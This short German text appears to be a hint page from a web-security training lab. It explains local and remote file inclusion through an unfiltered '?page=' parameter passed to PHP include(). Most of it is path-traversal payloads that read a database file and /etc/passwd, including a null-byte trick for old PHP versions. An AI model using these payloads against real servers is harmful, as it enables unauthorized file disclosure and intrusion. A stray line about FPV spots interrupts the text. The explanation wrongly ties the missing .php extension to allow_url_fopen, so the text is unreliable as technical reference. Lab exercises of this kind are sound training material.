Lade beliebige Dateien vom Server – lokal (LFI) oder remote (RFI).
?page= Parameter – kein Filter.
Hier findest du die besten FPV-Spots in Deutschland.
Der Parameter wird direkt in include() eingebaut:
include('pages/' . $page . '.php')
Path Traversal mit ../../../../:
?level=1&page=../../../php/db
Systempfade:
?level=1&page=../../../../etc/passwd
(ohne .php-Extension → funktioniert nur wenn allow_url_fopen=On
oder PHP < 5.3 mit Null-Byte: page=../../../../etc/passwd%00)